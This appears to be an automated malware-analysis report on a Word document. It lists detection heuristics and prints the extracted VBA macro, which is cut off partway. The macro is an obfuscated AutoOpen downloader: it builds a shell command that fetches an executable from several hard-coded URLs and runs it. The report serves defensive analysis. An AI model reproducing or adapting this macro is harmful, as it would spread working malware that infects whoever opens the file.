MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes the Shell() function, indicating an attempt to execute an external command or payload. The ClamAV heuristic also flags this as a downloader, further supporting the malicious intent.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-6682690-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6682690-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5008 bytes |
SHA-256: 42aa7de7ce529ec881126a3c822485572cd81732793f756ffc04ee6d56770551 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QlpHHZRDSaSz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set LwOYZJ = SfXUC
Set ozwzX = jvHKm
Set GiCKb = djjwc
Set CIpwiR = nnRwDZ
Shell OWKbk + FYHiBaulkUj + EmJtuMBUKaiYI + XbjjnRM, Format(0)
Set ZfSNGH = GNrcK
Set nqHUn = iSiXQ
Set pdcXsf = TPtnO
End Sub
Attribute VB_Name = "cKQnqEZvqf"
Function OWKbk()
On _
Error _
Resume _
Next
Set TTipvb = vqABR
Set cBVwL = MbMATS
Set hWcHi = UJFjT
Set iVrwlY = mwbjUZ
Set CSzcW = BPjJmS
VJFmbSNZ = Format(Chr(10 + 5 + 15 + 16 + 53)) + "md" + " /V^" + ":/" + Format(Chr(7 + 4 + 10 + 11 + 35)) + Format(Chr(3 + 1 + 4 + 5 + 21)) + "^s" + "^e^t U" + "^" + "Q^K=^ " + " ^ ^ " + " ^ "
Set uRrBi = KhTqw
Set GLmwGw = RFENqV
Set dKIMR = Bhtfi
Set NSJDEz = OSkni
Set CmKwfO = ThMVKk
aAwwVX = " ^ " + " ^" + " ^}}^{" + "h" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^" + "ta" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^" + "}" + "^;^" + "ka" + "^e" + "r" + "b^;"
Set OSQiR = SCsqi
Set kwhtOf = oZfWf
Set FQSzd = wTuFc
iWfkRLiLbdp = "O^" + "J" + "^i$^ m^" + "e" + "tI-ek"
Set bSRdVa = kLmTF
Set omtCmC = lZtFu
Set BcQvt = NGOsK
OLKEKUsM = "^ov" + "nI^;)O^" + "J^i^$" + "^" + " ^,^U^a" + "z^$(^"
Set FjdXF = fHLaj
Set ptXYbf = jiVYM
Set hYBsi = sjsQi
Set ltRqPJ = YNqUi
fNaNGMq = "eli^" + "Fdaol" + "n^wo" + "^D^.l" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "T^$^{" + "y" + "r"
Set WKFLOB = jJhwSp
Set HqlDO = RiJDTu
Set hJIiHK = KWaanK
ziVUQoBwFU = "t^" + "{)^ah" + "^o^" + "$ ni ^" + "U^a^z^" + "$(^" + "h" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "a" + "^e" + "rof;'e" + "^" + "x^e." + "'+wM^"
Set qhPMi = wVUvEj
Set vGdAc = pjiwT
Set LcbiJ = rMlfH
Set MnNLF = OPiTJ
ikKTuJGS = "d$^+^" + "'\^'" + "+" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "i^lbu" + "^p:v" + "ne^"
Set cHzQtl = lttRv
Set vKbWA = LBVWt
Set EjISUi = PEmONO
Set tUuKrK = UsmJF
mzEzUR = "$^" + "=^O^" + "Ji^$" + ";^'^" + "0^9" + "^"
Set dWcDGE = azQXoq
Set ImhkH = cjZYk
fPhpjtfqOIE = "5" + "' ^=^ ^" + "wMd$^;" + ")" + "^'^@'(" + "t" + "^ilpS." + "^'9d^M" + "^j" + "^1" + "^H" + "D" + "t7x"
Set KZNpTI = lKkXJt
Set UVdwfd = XnSkA
Set fWrUv = qJwXPV
rdvswkBZq = "/" + "mo" + Format(Chr(10 + 5 + 15 + 16 + 53)) + ".n^" + "u^gv" + "od//^" + ":^p^" + "tth^@" + "S^5u^O"
Set NwHfpF = HQlBo
TkEdnVoVw = "^u" + "^AS" + "O^" + "1f" + "/^t^" + "e" + "n." + "ets^" + "k^e"
Set jIEjf = fpwKD
Set ZtSzr = KSBMCz
Set GjJGu = aTcVzz
Set GmGlC = EGEMQa
Set bitwn = bnHQoz
Set JJUluf = jbvtc
kAiPDAA = "tn^o" + "kv//" + "^:p^tt" + "h@b^I" + "q^" + "zH" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "^zI^" + "3Y/^or^" + ".^t"
Set wELkX = VJCukd
MUZZCi = "^fo^s" + "^" + "tn^irps" + ".^1" + "^3" + "^pw" + "s^l" + "^g//" + ":p^t^" + "th^@" + "^D" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "^s^A" + "^S^J^E" + "/"
OWKbk = VJFmbSNZ + aAwwVX + iWfkRLiLbdp + OLKEKUsM + fNaNGMq + ziVUQoBwFU + ikKTuJGS + mzEzUR + fPhpjtfqOIE + rdvswkBZq + TkEdnVoVw + kAiPDAA + MUZZCi
Set UTjiK = dwkFto
Set iEjNwG = FqYlE
Set CHQHN = rjNfjZ
End Function
Function FYHiBaulkUj()
On _
Error _
Resume _
Next
Set iisjPU = APDwAP
Set zFzNt = plasCz
Set jZlzi = usUUv
aaIwGlVq = "mo" + Format(Chr(10 + 5 + 15 + 16 + 53)) + ".^e" + "^" + "dnar^g" + "as" + "a" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "a^tni" + "uq//^" + ":p^t" + "th^@936" + "^L" + "^" + "4^PE" + "/^"
Set DOscG = ibbHO
Set sRrNUw = jiNBkR
Set ldShV = iMAatp
FYkDO = "ku^.^o" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^.sut" + "la^t//" + ":^" + "p^t^t^" + "h^'=a^" + "ho$^" + ";tn^" + "e^"
Set ilhXBb = HaOLQY
suvliajd = "i" + "^l" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "be^W." + "teN^" + " ^t" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "ej^" + "bo-wen^" + "=^l" + Format(Chr(10 + 5 + 15
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.